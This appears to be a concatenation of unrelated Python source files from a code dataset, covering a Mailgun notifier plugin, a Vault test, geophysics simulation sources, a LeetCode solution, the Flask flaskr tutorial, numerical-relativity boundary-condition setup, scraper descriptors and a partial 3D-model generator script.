# Define our template tokens
template_tokens = dict(NotifyBase.template_tokens, **{
'user': {
'name': _('User Name'),
'type': 'string',
'required': True,
},
'host': {
'name': _('Domain'),
'type': 'string',
'required': True,
},
'apikey': {
'name': _('API Key'),
'type': 'string',
'private': True,
'required': True,
},
'targets': {
'name': _('Target Emails'),
'type': 'list:string',
},
})
# Define our template arguments
template_args = dict(NotifyBase.template_args, **{
'name': {
'name': _('From Name'),
'type': 'string',
'map_to': 'from_name',
},
'region': {
'name': _('Region Name'),
'type': 'choice:string',
'values': MAILGUN_REGIONS,
'default': MailgunRegion.US,
'map_to': 'region_name',
},
'to': {
'alias_of': 'targets',
},
})
def __init__(self, apikey, targets, from_name=None, region_name=None,
**kwargs):
"""
Initialize Mailgun Object
"""
super(NotifyMailgun, self).__init__(**kwargs)
# API Key (associated with project)
self.apikey = validate_regex(apikey)
if not self.apikey:
msg = 'An invalid Mailgun API Key ' \
'({}) was specified.'.format(apikey)
self.logger.warning(msg)
raise TypeError(msg)
# Validate our username
if not self.user:
msg = 'No Mailgun username was specified.'
self.logger.warning(msg)
raise TypeError(msg)
# Parse our targets
self.targets = parse_list(targets)
# Store our region
try:
self.region_name = self.mailgun_default_region \
if region_name is None else region_name.lower()
if self.region_name not in MAILGUN_REGIONS:
# allow the outer except to handle this common response
raise
except:
# Invalid region specified
msg = 'The Mailgun region specified ({}) is invalid.' \
.format(region_name)
self.logger.warning(msg)
raise TypeError(msg)
# Get our From username (if specified)
self.from_name = from_name
# Get our from email address
self.from_addr = '{user}@{host}'.format(user=self.user, host=self.host)
if not is_email(self.from_addr):
# Parse Source domain based on from_addr
msg = 'Invalid ~From~ email format: {}'.format(self.from_addr)
self.logger.warning(msg)
raise TypeError(msg)
def send(self, body, title='', notify_type=NotifyType.INFO, **kwargs):
"""
Perform Mailgun Notification
"""
# error tracking (used for function return)
has_error = False
# Prepare our headers
headers = {
'User-Agent': self.app_id,
'Accept': 'application/json',
}
# Prepare our payload
payload = {
'from': '{name} <{addr}>'.format(
name=self.app_id if not self.from_name else self.from_name,
addr=self.from_addr),
'subject': title,
'text': body,
}
# Prepare our URL as it's based on our hostname
url = '{}{}/messages'.format(
MAILGUN_API_LOOKUP[self.region_name], self.host)
# Create a copy of the targets list
emails = list(self.targets)
if len(emails) == 0:
# No email specified; use the from
emails.append(self.from_addr)
while len(emails):
# Get our email to notify
email = emails.pop(0)
# Prepare our user
payload['to'] = '{} <{}>'.format(email, email)
# Some Debug Logging
self.logger.debug('Mailgun POST URL: {} (cert_verify={})'.format(
url, self.verify_certificate))
self.logger.debug('Mailgun Payload: {}' .format(payload))
# Always call throttle before any remote server i/o is made
self.throttle()
try:
r = requests.post(
url,
auth=("api", self.apikey),
data=payload,
headers=headers,
verify=self.verify_certificate,
)
if r.status_code != requests.codes.ok:
# We had a problem
status_str = \
NotifyBase.http_response_code_lookup(
                            r.status_code, MAILGUN_HTTP_ERROR_MAP)
self.logger.warning(
'Failed to send Mailgun notification to {}: '
'{}{}error={}.'.format(
email,
status_str,
', ' if status_str else '',
r.status_code))
self.logger.debug(
'Response Details:\r\n{}'.format(r.content))
# Mark our failure
has_error = True
continue
else:
self.logger.info(
'Sent Mailgun notification to {}.'.format(email))
except requests.RequestException as e:
self.logger.warning(
                    'A Connection error occurred sending Mailgun:%s ' % (
email) + 'notification.'
)
self.logger.debug('Socket Exception: %s' % str(e))
# Mark our failure
has_error = True
continue
return not has_error
def url(self, privacy=False, *args, **kwargs):
"""
Returns the URL built dynamically based on specified arguments.
"""
# Define any arguments set
args = {
'format': self.notify_format,
'overflow': self.overflow_mode,
'verify': 'yes' if self.verify_certificate else 'no',
'region': self.region_name,
}
if self.from_name is not None:
# from_name specified; pass it back on the url
args['name'] = self.from_name
return '{schema}://{user}@{host}/{apikey}/{targets}/?{args}'.format(
schema=self.secure_protocol,
host=self.host,
user=NotifyMailgun.quote(self.user, safe=''),
apikey=self.pprint(self.apikey, privacy, safe=''),
targets='/'.join(
[NotifyMailgun.quote(x, safe='') for x in self.targets]),
args=NotifyMailgun.urlencode(args))
@staticmethod
def parse_url(url):
"""
Parses the URL and returns enough arguments that can allow
us to substantiate this object.
"""
results = NotifyBase.parse_url(url)
if not results:
# We're done early as we couldn't load the results
return results
# Get our entries; split_path() looks after unquoting content for us
# by default
results['targets'] = NotifyMailgun.split_path(results['fullpath'])
# Our very first entry is reserved for our api key
try:
results['apikey'] = results['targets'].pop(0)
except IndexError:
# We're done - no API Key found
results['apikey'] = None
if 'name' in results['qsd'] and len(results['qsd']['name']):
# Extract from name to associate with from address
results['from_name'] = \
NotifyMailgun.unquote(results['qsd']['name'])
if 'region' in results['qsd'] and len(results['qsd']['region']):
# Extract from name to associate with from address
results['region_name'] = \
NotifyMailgun.unquote(results['qsd']['region'])
# Support the 'to' variable so that we can support targets this way too
# The 'to' makes it easier to use yaml configuration
if 'to' in results['qsd'] and len(results['qsd']['to']):
results['targets'] += \
NotifyMailgun.parse_list(results['qsd']['to'])
return results
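# Illustrative only -- not part of the original plugin. A minimal sketch of how
# this notifier is normally exercised through the public Apprise object; the
# sandbox domain and API key are the examples from the comments above, and the
# target address is a placeholder, not a real credential.
def _example_send_mailgun_notification():
    import apprise
    apobj = apprise.Apprise()
    apobj.add(
        'mailgun://postmaster@sandbox74bda3414c06kb5acb946.mailgun.org/'
        '4b4f2918c6c21ba0a26ad2af73c07f4d-dk5f51da-8f91a0df/'
        '[email protected]/?region=us')
    return apobj.notify(title='Test', body='Hello from Mailgun')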
|
py | 7dfd12afeb254731576fdb52ac87f249536e7e6b | # Copyright 2018 Canonical Ltd
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import mock
import charm.vault_utils as vault_utils
import charms_openstack.test_utils as test_utils
class TestVaultUtils(test_utils.PatchHelper):
def test_retrieve_secret_id(self):
self.patch_object(vault_utils, 'hvac')
hvac_client = mock.MagicMock()
self.hvac.Client.return_value = hvac_client
response = mock.MagicMock()
response.status_code = 200
response.json.return_value = {'data': {'secret_id': 'FAKE_SECRET_ID'}}
hvac_client._post.return_value = response
self.assertEqual(
vault_utils.retrieve_secret_id('url', 'token'), 'FAKE_SECRET_ID')
hvac_client._post.assert_called_with('/v1/sys/wrapping/unwrap')
|
py | 7dfd12c0d3b38c6238ae2cf1d7aae5304cce34d8 | from __future__ import print_function
from __future__ import absolute_import
from __future__ import division
import numpy as np
import scipy.sparse as sp
from SimPEG import Maps, mkvc
from SimPEG.EM.FDEM.SrcFDEM import BaseFDEMSrc as FDEMBaseSrc
from SimPEG.EM.Utils import omega
from .Utils.sourceUtils import homo1DModelSource
#################
### Sources ###
#################
class BaseNSEMSrc(FDEMBaseSrc):
'''
Sources for the NSEM problem.
Use the SimPEG BaseSrc, since the source fields share properties with the transmitters.
:param float freq: The frequency of the source
:param list rxList: A list of receivers associated with the source
'''
freq = None #: Frequency (float)
def __init__(self, rxList, freq):
self.freq = float(freq)
FDEMBaseSrc.__init__(self, rxList)
# 1D sources
class Planewave_xy_1DhomotD(BaseNSEMSrc):
"""
NSEM source for both polarizations (x and y) for the total Domain.
    It computes fields based on conditions on the boundary of the domain.
"""
def __init__(self, rxList, freq):
BaseNSEMSrc.__init__(self, rxList, freq)
# Need to implement such that it works for all dims.
# Rename to be more descriptive
class Planewave_xy_1Dprimary(BaseNSEMSrc):
"""
NSEM planewave source for both polarizations (x and y)
    estimated from a single 1D primary model.
"""
def __init__(self, rxList, freq):
# assert mkvc(self.mesh.hz.shape,1) == mkvc(sigma1d.shape,1),'The number of values in the 1D background model does not match the number of vertical cells (hz).'
self.sigma1d = None
BaseNSEMSrc.__init__(self, rxList, freq)
def ePrimary(self, problem):
# Get primary fields for both polarizations
if self.sigma1d is None:
# Set the sigma1d as the 1st column in the background model
if len(problem._sigmaPrimary) == problem.mesh.nC:
if problem.mesh.dim == 1:
self.sigma1d = problem.mesh.r(
problem._sigmaPrimary, 'CC', 'CC', 'M')[:]
elif problem.mesh.dim == 3:
self.sigma1d = problem.mesh.r(
problem._sigmaPrimary, 'CC', 'CC', 'M')[0, 0, :]
# Or as the 1D model that matches the vertical cell number
elif len(problem._sigmaPrimary) == problem.mesh.nCz:
self.sigma1d = problem._sigmaPrimary
if self._ePrimary is None:
self._ePrimary = homo1DModelSource(
problem.mesh, self.freq, self.sigma1d)
return self._ePrimary
def bPrimary(self, problem):
# Project ePrimary to bPrimary
# Satisfies the primary(background) field conditions
if problem.mesh.dim == 1:
C = problem.mesh.nodalGrad
elif problem.mesh.dim == 3:
C = problem.mesh.edgeCurl
bBG_bp = (- C * self.ePrimary(problem)) * (1 / (1j * omega(self.freq)))
return bBG_bp
def S_e(self, problem):
"""
Get the electrical field source
"""
e_p = self.ePrimary(problem)
Map_sigma_p = Maps.SurjectVertical1D(problem.mesh)
sigma_p = Map_sigma_p._transform(self.sigma1d)
# Make mass matrix
# Note: M(sig) - M(sig_p) = M(sig - sig_p)
        # Need to deal with the edge/face discrepancies between 1d/2d/3d
if problem.mesh.dim == 1:
Mesigma = problem.mesh.getFaceInnerProduct(problem.sigma)
Mesigma_p = problem.mesh.getFaceInnerProduct(sigma_p)
if problem.mesh.dim == 2:
pass
if problem.mesh.dim == 3:
Mesigma = problem.MeSigma
Mesigma_p = problem.mesh.getEdgeInnerProduct(sigma_p)
return (Mesigma - Mesigma_p) * e_p
def S_eDeriv(self, problem, v, adjoint=False):
"""
        The derivative of S_e with respect to sigma (m)
"""
return self.S_eDeriv_m(problem, v, adjoint)
def S_eDeriv_m(self, problem, v, adjoint=False):
'''
Get the derivative of S_e wrt to sigma (m)
'''
# Need to deal with
if problem.mesh.dim == 1:
# Need to use the faceInnerProduct
ePri = self.ePrimary(problem)[:, 1]
MsigmaDeriv = (
problem.mesh.getFaceInnerProductDeriv(problem.sigma)(ePri) *
problem.sigmaDeriv)
# MsigmaDeriv = ( MsigmaDeriv * MsigmaDeriv.T)**2
if adjoint:
#
return MsigmaDeriv.T * v
else:
# v should be nC size
return MsigmaDeriv * v
if problem.mesh.dim == 2:
raise NotImplementedError('The NSEM 2D problem is not implemented')
if problem.mesh.dim == 3:
# Need to take the derivative of both u_px and u_py
# And stack them to be of the correct size
e_p = self.ePrimary(problem)
if adjoint:
return (
problem.MeSigmaDeriv(
e_p[:, 0], v[:int(v.shape[0]/2)], adjoint
) +
problem.MeSigmaDeriv(
e_p[:, 1], v[int(v.shape[0]/2):], adjoint
)
)
# return sp.hstack((
# problem.MeSigmaDeriv(e_p[:, 0]).T,
# problem.MeSigmaDeriv(e_p[:, 1]).T)) * v
else:
return np.hstack((
mkvc(problem.MeSigmaDeriv(e_p[:, 0], v, adjoint), 2),
mkvc(problem.MeSigmaDeriv(e_p[:, 1], v, adjoint), 2)))
class Planewave_xy_3Dprimary(BaseNSEMSrc):
"""
NSEM source for both polarizations (x and y) given a 3D primary model.
It assigns fields calculated from the 1D model
as fields in the full space of the problem.
"""
def __init__(self, rxList, freq):
# assert mkvc(self.mesh.hz.shape,1) == mkvc(sigma1d.shape,1),'The number of values in the 1D background model does not match the number of vertical cells (hz).'
self.sigmaPrimary = None
BaseNSEMSrc.__init__(self, rxList, freq)
# Hidden property of the ePrimary
self._ePrimary = None
def ePrimary(self, problem):
# Get primary fields for both polarizations
self.sigmaPrimary = problem._sigmaPrimary
if self._ePrimary is None:
self._ePrimary = homo3DModelSource(
problem.mesh, self.sigmaPrimary, self.freq)
return self._ePrimary
def bPrimary(self, problem):
# Project ePrimary to bPrimary
# Satisfies the primary(background) field conditions
if problem.mesh.dim == 1:
C = problem.mesh.nodalGrad
elif problem.mesh.dim == 3:
C = problem.mesh.edgeCurl
bBG_bp = (
(- C * self.ePrimary(problem)) *
(1 / (1j * omega(self.freq))))
return bBG_bp
def S_e(self, problem):
"""
Get the electrical field source
"""
e_p = self.ePrimary(problem)
Map_sigma_p = Maps.SurjectVertical1D(problem.mesh)
sigma_p = Map_sigma_p._transform(self.sigma1d)
# Make mass matrix
# Note: M(sig) - M(sig_p) = M(sig - sig_p)
        # Need to deal with the edge/face discrepancies between 1d/2d/3d
if problem.mesh.dim == 1:
Mesigma = problem.mesh.getFaceInnerProduct(problem.sigma)
Mesigma_p = problem.mesh.getFaceInnerProduct(sigma_p)
if problem.mesh.dim == 2:
pass
if problem.mesh.dim == 3:
Mesigma = problem.MeSigma
Mesigma_p = problem.mesh.getEdgeInnerProduct(sigma_p)
return (Mesigma - Mesigma_p) * e_p
def S_eDeriv_m(self, problem, v, adjoint=False):
'''
Get the derivative of S_e wrt to sigma (m)
'''
# Need to deal with
if problem.mesh.dim == 1:
# Need to use the faceInnerProduct
MsigmaDeriv = (
problem.mesh.getFaceInnerProductDeriv(
problem.sigma)(self.ePrimary(problem)[:, 1]) *
problem.sigmaDeriv)
# MsigmaDeriv = ( MsigmaDeriv * MsigmaDeriv.T)**2
if problem.mesh.dim == 2:
pass
if problem.mesh.dim == 3:
# Need to take the derivative of both u_px and u_py
ePri = self.ePrimary(problem)
if adjoint:
return (
problem.MeSigmaDeriv(
ePri[:, 0], v[:int(v.shape[0]/2)], adjoint
) +
problem.MeSigmaDeriv(
ePri[:, 1], v[int(v.shape[0]/2):], adjoint
)
)
# return sp.hstack((
# problem.MeSigmaDeriv(ePri[:, 0]).T,
# problem.MeSigmaDeriv(ePri[:, 1]).T)) * v
else:
return np.hstack((
mkvc(problem.MeSigmaDeriv(ePri[:, 0], v, adjoint), 2),
mkvc(problem.MeSigmaDeriv(ePri[:, 1], v, adjoint), 2)
))
if adjoint:
#
return MsigmaDeriv.T * v
else:
# v should be nC size
return MsigmaDeriv * v
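# Illustrative only -- not part of the original module: sources are constructed
# per frequency from a list of NSEM receivers defined elsewhere, e.g.
#
#   src = Planewave_xy_1Dprimary(rxList=my_receivers, freq=0.01)
#
# where my_receivers is an assumed, user-supplied list of receiver objects.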
|
py | 7dfd12c43abf5401c01cdb8fa979998733d45dfc | # @l2g 2032 python3
# [2032] Two Out of Three
# Difficulty: Easy
# https://leetcode.com/problems/two-out-of-three
#
# Given three integer arrays nums1,nums2,and nums3,
# return a distinct array containing all the values that are present in at least two out of the three arrays.
# You may return the values in any order.
#
# Example 1:
#
# Input: nums1 = [1,1,3,2], nums2 = [2,3], nums3 = [3]
# Output: [3,2]
# Explanation: The values that are present in at least two arrays are:
# - 3, in all three arrays.
# - 2, in nums1 and nums2.
#
# Example 2:
#
# Input: nums1 = [3,1], nums2 = [2,3], nums3 = [1,2]
# Output: [2,3,1]
# Explanation: The values that are present in at least two arrays are:
# - 2, in nums2 and nums3.
# - 3, in nums1 and nums2.
# - 1, in nums1 and nums3.
#
# Example 3:
#
# Input: nums1 = [1,2,2], nums2 = [4,3,3], nums3 = [5]
# Output: []
# Explanation: No value is present in at least two arrays.
#
#
# Constraints:
#
# 1 <= nums1.length, nums2.length, nums3.length <= 100
# 1 <= nums1[i], nums2[j], nums3[k] <= 100
#
#
from typing import List
class Solution:
def twoOutOfThree(self, nums1: List[int], nums2: List[int], nums3: List[int]) -> List[int]:
ans = set()
set_1 = set(nums1)
set_2 = set(nums2)
set_3 = set(nums3)
ans = ans | (set_1 & set_2)
ans = ans | (set_2 & set_3)
ans = ans | (set_3 & set_1)
return list(ans)
if __name__ == "__main__":
import os
import pytest
pytest.main([os.path.join("tests", "test_2032.py")])
|
py | 7dfd12cc1694f6d53b708f59b84ee687147ee292 | # -*- coding: utf-8 -*-
# all the imports
import os
import sqlite3
from flask import Flask, request, session, g, redirect, url_for, abort, render_template, flash
app = Flask(__name__) # create the application instance :)
app.config.from_object(__name__) # load config from this file, flaskr.py
# Load default config and override config from an environment variable
app.config.update(dict(
DATABASE=os.path.join(app.root_path, 'alacenapp.db'),
SECRET_KEY='development key',
USERNAME='admin',
PASSWORD='default'
))
app.config.from_envvar('FLASKR_SETTINGS', silent=True)
def connect_db():
"""Connects to the specific database"""
rv = sqlite3.connect(app.config['DATABASE'])
rv.row_factory = sqlite3.Row
return rv
def get_db():
"""Opens a new database connection if there is none yet for the current application context
"""
if not hasattr(g, 'sqlite_db'):
g.sqlite_db = connect_db()
return g.sqlite_db
@app.teardown_appcontext
def close_db(error):
"""Closes the database again at the end of the request."""
if hasattr(g, 'sqlite_db'):
g.sqlite_db.close()
def init_db():
db = get_db()
with app.open_resource('schema.sql', mode='r') as f:
db.cursor().executescript(f.read())
db.commit()
@app.cli.command('initdb')
def initdb_command():
"""Initializes the database."""
init_db()
print('Initialized the database.')
@app.route('/')
def show_entries():
db = get_db()
cur = db.execute('select title, text from entries order by id desc')
entries = cur.fetchall()
return render_template('show_entries.html',entries=entries)
@app.route('/add', methods=['POST'])
def add_entry():
if not session.get('logged_in'):
abort(401)
db = get_db()
db.execute('insert into entries (title, text) values (?, ?)',
[request.form['title'], request.form['text']])
db.commit()
    flash('New entry was successfully posted')
    return redirect(url_for('show_entries'))
@app.route('/login', methods=['GET', 'POST'])
def login():
error = None
if request.method == 'POST':
if request.form['username'] != app.config['USERNAME']:
error = 'Invalid username'
elif request.form['password'] != app.config['PASSWORD']:
error = 'Invalid password'
else:
session['logged_in'] = True
flash('You were logged in')
return redirect(url_for('show_entries'))
return render_template('login.html', error=error)
@app.route('/logout')
def logout():
session.pop('logged_in', None)
flash('You were logged out')
return redirect(url_for('show_entries'))
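# Illustrative only -- not part of the original app. With this module saved as
# flaskr.py, the app is typically initialised and served via the Flask CLI:
#
#   export FLASK_APP=flaskr.py
#   flask initdb     # runs the custom initdb_command defined above
#   flask run        # starts the development server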
|
py | 7dfd132d0e58de7633ffb7978ceb26338adec682 | # This module provides functions for setting up Curvilinear boundary conditions,
# as documented in Tutorial-Start_to_Finish-Curvilinear_BCs.ipynb
# Author: Zachariah B. Etienne
# zachetie **at** gmail **dot* com
# First we import needed core NRPy+ modules
from outputC import *
import NRPy_param_funcs as par
import grid as gri
import loop as lp
import indexedexp as ixp
import finite_difference as fin
import reference_metric as rfm
import sys
def Set_up_CurviBoundaryConditions(outdir="CurviBoundaryConditions/",verbose=True):
# Step 0: Set up reference metric in case it hasn't already been set up.
# (Doing it twice hurts nothing).
rfm.reference_metric()
# Step 1: Set unit-vector dot products (=parity) for each of the 10 parity condition types
parity = ixp.zerorank1(DIM=10)
UnitVectors_inner = ixp.zerorank2()
xx0_inbounds, xx1_inbounds, xx2_inbounds = sp.symbols("xx0_inbounds xx1_inbounds xx2_inbounds", real=True)
for i in range(3):
for j in range(3):
UnitVectors_inner[i][j] = rfm.UnitVectors[i][j].subs(rfm.xx[0], xx0_inbounds).subs(rfm.xx[1],
xx1_inbounds).subs(
rfm.xx[2], xx2_inbounds)
# Type 0: scalar
parity[0] = sp.sympify(1)
# Type 1: i0-direction vector or one-form
# Type 2: i1-direction vector or one-form
# Type 3: i2-direction vector or one-form
for i in range(3):
for Type in range(1, 4):
parity[Type] += rfm.UnitVectors[Type - 1][i] * UnitVectors_inner[Type - 1][i]
# Type 4: i0i0-direction rank-2 tensor
# parity[4] = parity[1]*parity[1]
# Type 5: i0i1-direction rank-2 tensor
# Type 6: i0i2-direction rank-2 tensor
# Type 7: i1i1-direction rank-2 tensor
# Type 8: i1i2-direction rank-2 tensor
# Type 9: i2i2-direction rank-2 tensor
count = 4
for i in range(3):
for j in range(i, 3):
parity[count] = parity[i + 1] * parity[j + 1]
count = count + 1
lhs_strings = []
for i in range(10):
lhs_strings.append("parity[" + str(i) + "]")
outputC(parity, lhs_strings, outdir + "parity_conditions_symbolic_dot_products.h")
# Step 2.a: Generate outdir+gridfunction_defines.h file,
# containing human-readable gridfunction aliases
evolved_variables_list, auxiliary_variables_list, auxevol_variables_list = gri.output__gridfunction_defines_h__return_gf_lists(outdir)
# Step 2.b: set the parity conditions on all gridfunctions in gf_list,
# based on how many digits are at the end of their names
def set_parity_types(gf_list):
parity_type = []
for i in range(len(gf_list)):
varname = gf_list[i]
parity_type__orig_len = len(parity_type)
if len(varname) > 2:
if varname[-2] == "0" and varname[-1] == "0": # In Python, a[-1] points to the last
# element of a list; a[-2] the
# second-to-last element, etc.
parity_type.append(4)
elif varname[-2] == "0" and varname[-1] == "1":
parity_type.append(5)
elif varname[-2] == "0" and varname[-1] == "2":
parity_type.append(6)
elif varname[-2] == "1" and varname[-1] == "1":
parity_type.append(7)
elif varname[-2] == "1" and varname[-1] == "2":
parity_type.append(8)
elif varname[-2] == "2" and varname[-1] == "2":
parity_type.append(9)
if len(varname) > 1 and len(parity_type) == parity_type__orig_len:
if varname[-1] == "0":
parity_type.append(1)
elif varname[-1] == "1":
parity_type.append(2)
elif varname[-1] == "2":
parity_type.append(3)
if varname[len(varname) - 1].isdigit() == False:
parity_type.append(0)
if len(parity_type) == parity_type__orig_len:
print("Error: Could not figure out parity type for evolved variable: " + varname)
sys.exit(1)
return parity_type
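    # Illustrative examples of the trailing-digit convention implemented above
    # (typical BSSN-style gridfunction names, used here only as assumed inputs):
    #   "trK"   -> no trailing digit -> parity type 0 (scalar)
    #   "betU0" -> ends in "0"       -> parity type 1 (i0 vector component)
    #   "hDD01" -> ends in "01"      -> parity type 5 (i0i1 rank-2 component)
    #   "hDD22" -> ends in "22"      -> parity type 9 (i2i2 rank-2 component)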
evol_parity_type = set_parity_types(evolved_variables_list)
aux_parity_type = set_parity_types(auxiliary_variables_list)
auxevol_parity_type = set_parity_types(auxevol_variables_list)
# Step 2.c: Output all gridfunctions to outdir+"/gridfunction_defines.h"
# ... then append to the file the parity type for each gridfunction.
with open(outdir + "/gridfunction_defines.h", "a") as file:
file.write("\n\n/* PARITY TYPES FOR ALL GRIDFUNCTIONS.\n")
file.write(
" SEE \"Tutorial-Start_to_Finish-Curvilinear_BCs.ipynb\" FOR DEFINITIONS. */\n")
if len(evolved_variables_list) > 0:
file.write("const int8_t evol_gf_parity[" + str(len(evolved_variables_list)) + "] = { ")
for i in range(len(evolved_variables_list) - 1):
file.write(str(evol_parity_type[i]) + ", ")
file.write(str(evol_parity_type[len(evolved_variables_list) - 1]) + " };\n")
if len(auxiliary_variables_list) > 0:
file.write("const int8_t aux_gf_parity[" + str(len(auxiliary_variables_list)) + "] = { ")
for i in range(len(auxiliary_variables_list) - 1):
file.write(str(aux_parity_type[i]) + ", ")
file.write(str(aux_parity_type[len(auxiliary_variables_list) - 1]) + " };\n")
if len(auxevol_variables_list) > 0:
file.write("const int8_t auxevol_gf_parity[" + str(len(auxevol_variables_list)) + "] = { ")
for i in range(len(auxevol_variables_list) - 1):
file.write(str(auxevol_parity_type[i]) + ", ")
file.write(str(auxevol_parity_type[len(auxevol_variables_list) - 1]) + " };\n")
if verbose == True:
for i in range(len(evolved_variables_list)):
print("Evolved gridfunction \"" + evolved_variables_list[i] + "\" has parity type " + str(
evol_parity_type[i]) + ".")
for i in range(len(auxiliary_variables_list)):
print("Auxiliary gridfunction \"" + auxiliary_variables_list[i] + "\" has parity type " + str(
aux_parity_type[i]) + ".")
for i in range(len(auxevol_variables_list)):
print("AuxEvol gridfunction \"" + auxevol_variables_list[i] + "\" has parity type " + str(
auxevol_parity_type[i]) + ".")
# Step 3: Find the Eigen-Coordinate and set up the Eigen-Coordinate's reference metric:
CoordSystem_orig = par.parval_from_str("reference_metric::CoordSystem")
par.set_parval_from_str("reference_metric::CoordSystem", rfm.get_EigenCoord())
rfm.reference_metric()
# Step 4: Output C code for the Eigen-Coordinate mapping from xx->Cartesian:
rfm.xxCart_h("EigenCoord_xxCart", "../set_Cparameters.h", outdir + "EigenCoord_xxCart.h")
# Step 5: Output the Eigen-Coordinate mapping from Cartesian->xx:
# Step 5.a: Sanity check: First make sure that rfm.Cart_to_xx has been set. Error out if not!
if rfm.Cart_to_xx[0] == 0 or rfm.Cart_to_xx[1] == 0 or rfm.Cart_to_xx[2] == 0:
print("ERROR: rfm.Cart_to_xx[], which maps Cartesian -> xx, has not been set for")
print(" reference_metric::CoordSystem = " + par.parval_from_str("reference_metric::CoordSystem"))
print(" Boundary conditions in curvilinear coordinates REQUIRE this be set.")
sys.exit(1)
# Step 5.b: Output C code for the Eigen-Coordinate mapping from Cartesian->xx:
outputC([rfm.Cart_to_xx[0], rfm.Cart_to_xx[1], rfm.Cart_to_xx[2]],
["Cart_to_xx0_inbounds", "Cart_to_xx1_inbounds", "Cart_to_xx2_inbounds"],
outdir + "EigenCoord_Cart_to_xx.h")
# Step 6: Restore reference_metric::CoordSystem back to the original CoordSystem
par.set_parval_from_str("reference_metric::CoordSystem", CoordSystem_orig)
rfm.reference_metric() |
py | 7dfd1488d683cdf9ac603a568f3c6f0788b53acc | from typing import Union, List, Callable
from hashlib import md5
class TagDesc:
__slots__ = ['tag', 'attrs', 'chld']
def __init__(self, tag: Union[str, bool], attrs: dict, chld: 'TagDesc'=None) -> None:
"""
tag: a tag selector (either a string with the tag name or a boolean for glob
attrs: a dict of the attributes of the tag should have
chld: a child selector, when you need to target more than one tag to query the right element
"""
self.tag = tag
self.attrs = attrs
self.chld = chld
class Filter:
__slots__ = ['content', 'next', 'exclude', 'flatten', 'transform']
def __init__(self, content: TagDesc, next_chap: TagDesc, exclude: List[TagDesc],
flatten:List[TagDesc]=None, transform:List[Callable[[str],str]]=None) -> None:
"""
content: a selector for the tag that contains the text
next_chap: a selector for the tag that contains the url
exclude: a list of selectors to remove from the extracted document
flatten: a list of selectors to flatten (i.e. remove the tags but keep the text) from the document
transform: a list of functions to run over the final text
"""
self.content = content
self.next = next_chap
self.exclude = exclude
if flatten is None:
flatten = []
self.flatten = flatten
if transform is None:
transform = []
self.transform = transform
class BookAttrs:
__slots__ = ['identifier', 'title', 'abbrev', 'lang', 'author']
def __init__(self, title: str, abbrev: str, lang='en', author='generated') -> None:
self.identifier = md5(title.encode()).hexdigest()
self.title = title
self.abbrev = abbrev
        self.lang = lang
self.author = author
class Page:
__slots__ = ['next', 'contents']
def __init__(self, contents: str, next_page: str) -> None:
self.next = next_page
self.contents = contents
def __str__(self) -> str:
return 'Page(contents={}, next={})'.format(repr(self.contents), repr(self.next))
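# Illustrative only -- not part of the original module. A minimal sketch of how
# the descriptors compose into a Filter for a hypothetical chapter page; the
# tag names and attribute values are assumptions, not tied to any real site.
def _example_filter() -> Filter:
    content = TagDesc('div', {'class': 'chapter-content'})
    next_chap = TagDesc('a', {'rel': 'next'})
    exclude = [TagDesc('script', {}), TagDesc('div', {'class': 'ads'})]
    return Filter(content, next_chap, exclude,
                  flatten=[TagDesc('span', {})],
                  transform=[str.strip])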
|
py | 7dfd14c83bfbec09c4268e7248fc1b9618edc673 | # sample of spectrum meter
import sys
import json
def quote(s):
return '"' + s + '"'
def print_header(config):
print('Header,2.1,0,0')
return
def print_model_info(config):
print('ModelInfo,"{0}","","",""'.format(
config['METER_MODEL_NAME']))
return
def print_vertexes(config):
V_TEMPLATE='Vertex,0,-1,1,0,0,0,-1,1,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,"b01",1,"",0,"",0,"",0,0,0,0,0,0,0,0,0,0'
VT = V_TEMPLATE.split(',')
vno = 0
n_bands = len(config['BAND_DEFS'][config['BANDS']][0])
for band in range(n_bands):
for index in range(4):
VT[1] = str(vno)
vno += 1
if index % 2 == 0:
VT[2] = str(band * config['BAR_WIDTH'])
else:
VT[2] = str(
(band + 1) * config['BAR_WIDTH'] - config['BAR_SPACE'])
if index < 2:
VT[28] = quote(config['METER_BONE_NAME']).format(band)
VT[3] = '0'
else:
VT[28] = '"b{0}0"'.format(band)
VT[3] = '0'
print(','.join(VT))
return
def print_materials(config):
M_TEMPLATE = 'Material,"平面","",1,1,1,0.8,0,0,0,100,0.3,0.3,0.3,1,0,0,0,0,0,0,1,0,0,0,1,"","",1,"",""'
F_TEMPLATE = 'Face,"平面",0,0,1,2'
MT = M_TEMPLATE.split(',')
n_bands = len(config['BAND_DEFS'][config['BANDS']][0])
for band in range(n_bands):
MT[1] = '"band{0}"'.format(band)
MT[3] = MT[11] = str(config['BAR_RGB'][0]) #diffuse, env
MT[4] = MT[12] = str(config['BAR_RGB'][1])
MT[5] = MT[13] = str(config['BAR_RGB'][2])
MT[7] = '0' #specular
MT[8] = '0'
MT[9] = '0'
MT[6] = str(config['BAR_TRANSPARENCY'])
print(','.join(MT))
for band in range(n_bands):
vbase = band * 4
for i in range(2):
if i == 0:
ftext = 'Face,"band{0}",{1},{2},{3},{4}'.format(
band, i, vbase, vbase + 1, vbase + 2, vbase + 3)
else:
ftext = 'Face,"band{0}",{1},{2},{3},{4}'.format(
band, i, vbase + 1, vbase + 3, vbase + 2)
print(ftext)
def print_bones(config):
B_TEMPLATE = 'Bone,"b00","",0,0,0,0,0,1,0,0,1,1,"",0,"",0,0,0,0,0,0,1,"",0,0,0,0,0,1,0,0,0,0,1,0,0,"",0,57.29578'
BT = B_TEMPLATE.split(',')
BT[1] = '"センター"'
BT[9] = '1'
print(','.join(BT))
BT[1] = '"bands_root"'
BT[9] = '1'
BT[13] = '"センター"'
print(','.join(BT))
n_bands = len(config['BAND_DEFS'][config['BANDS']][0])
for band in range(n_bands):
BT[5] = str(config['BAR_WIDTH'] * band + config['BAR_WIDTH'] / 2)
BT[1] = '"b{0}0"'.format(band)
BT[13] = '"bands_root"'
BT[9] = '0'
print(','.join(BT))
BT[13] = BT[1]
BT[1] = quote(config['METER_BONE_NAME']).format(band)
BT[9] = '1'
print(','.join(BT))
def print_morph(config):
M_TEMPLATE = 'Morph,"モーフ1","",4,2'
MT = M_TEMPLATE.split(',')
